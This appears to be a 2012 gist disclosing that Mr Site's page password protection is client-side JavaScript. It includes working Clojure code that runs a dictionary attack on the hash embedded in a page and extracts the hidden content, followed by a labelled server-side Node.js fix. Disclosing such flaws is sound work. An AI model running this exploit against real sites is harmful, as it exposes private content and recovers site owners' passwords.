@kzar
Created January 9, 2012 21:35
Mr Site password protection vulnerability
; Mr Site Password protection
; http://www.mrsite.com/videos/Tips_and_tricks_%E2%80%93_putting_a_password_on_your_web_pages/19525203
;
; The problem
; -----------
; For some reason Mr Site "secures" pages with client-side JavaScript password protection
; instead of using HTTP basic authentication or server-side code. Anyone can click
; "view source" and view the secrets. Worse, the password hash is available, so anyone could
; figure out the password used.
;
; Example
; -------
; Given the URL of a page using Mr Site's password protection, the code below returns a list of
; possible passwords and the secret content. It's complete overkill but there you go.
; Usage - (whoops "http://some-url.com/pageXX.html")
(ns scratch.core
  (:require [net.cgrand.enlive-html :as html])
  (:use [clojure.java.io :only [reader]]))

;; Fetch the page and parse it into an Enlive node tree.
(defn fetch [url]
  (with-open [rdr (clojure.java.io/reader url)]
    (html/html-resource rdr)))

;; Pull the numeric hash out of the onclick attribute of the input in div#test5.
(defn password-hash [resource]
  (->> (html/select resource [:div#test5 [:input (html/attr? :onclick)]])
       first :attrs :onclick
       (re-find #"\d+")
       Double.))

;; Hash a candidate password so it can be compared with the value embedded in the page.
(defn make-hash [password]
  (reduce (fn [^double hash [i ch]]
            (+ (* hash i) i (int ch)))
          0 (map-indexed vector password)))

;; Candidate passwords: the system dictionary, one word per line.
(def words (line-seq (reader "/usr/share/dict/words")))

(defn whoops
  "Returns secret content and a list of possible passwords."
  [url]
  (let [resource (fetch url)
        hash (password-hash resource)
        passwords (filter #(= hash (make-hash %)) words)
        content (apply str (html/emit* (html/select resource [:div.content])))]
    {:passwords passwords :content content}))
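
An added example, not part of the original gist or Mr Site's code: the server-side alternative named in the problem description, where the server checks HTTP Basic credentials against a salted scrypt hash and only sends the protected markup after they verify. The user name, password, realm, port and page body are constructed sample values, and the function names are hypothetical.

```javascript
// Added example: the password check runs on the server, not in the page.
// User name, password, realm and page body are constructed sample values.
const crypto = require('node:crypto');
const http = require('node:http');

// Keep only a salted scrypt hash of the password on the server.
const SALT = crypto.randomBytes(16);
const hashPassword = (pw) => crypto.scryptSync(pw, SALT, 32);
const USERS = new Map([['alice', hashPassword('correct horse battery staple')]]);
const SECRET_PAGE = '<div class="content">members-only content</div>';

// Parse "Authorization: Basic base64(user:pass)"; null when absent or malformed.
function parseBasic(header) {
  const m = /^Basic ([A-Za-z0-9+/]+=*)$/i.exec(header || '');
  if (!m) return null;
  const decoded = Buffer.from(m[1], 'base64').toString('utf8');
  const sep = decoded.indexOf(':');
  if (sep < 0) return null;
  return { user: decoded.slice(0, sep), pass: decoded.slice(sep + 1) };
}

// Build the response; the protected markup is only placed in the body on success.
function respond(authHeader) {
  const cred = parseBasic(authHeader);
  const stored = cred ? USERS.get(cred.user) : undefined;
  // Hash the candidate even for unknown users, then compare in constant time.
  const candidate = hashPassword(cred ? cred.pass : '');
  const ok = stored !== undefined && crypto.timingSafeEqual(candidate, stored);
  if (!ok) {
    return { status: 401, body: 'Authentication required',
             headers: { 'WWW-Authenticate': 'Basic realm="members"' } };
  }
  return { status: 200, body: SECRET_PAGE, headers: { 'Content-Type': 'text/html' } };
}

// Basic credentials are only base64-encoded, so serve this behind HTTPS.
// Start with: createServer().listen(8080, '127.0.0.1')
function createServer() {
  return http.createServer((req, res) => {
    const r = respond(req.headers.authorization);
    res.writeHead(r.status, r.headers);
    res.end(r.body);
  });
}

// What a client without the password receives: a 401 and none of the content.
console.log(respond(undefined));
```

Unlike the client-side scheme, "view source" on the 401 response shows neither the content nor any value derived from the password.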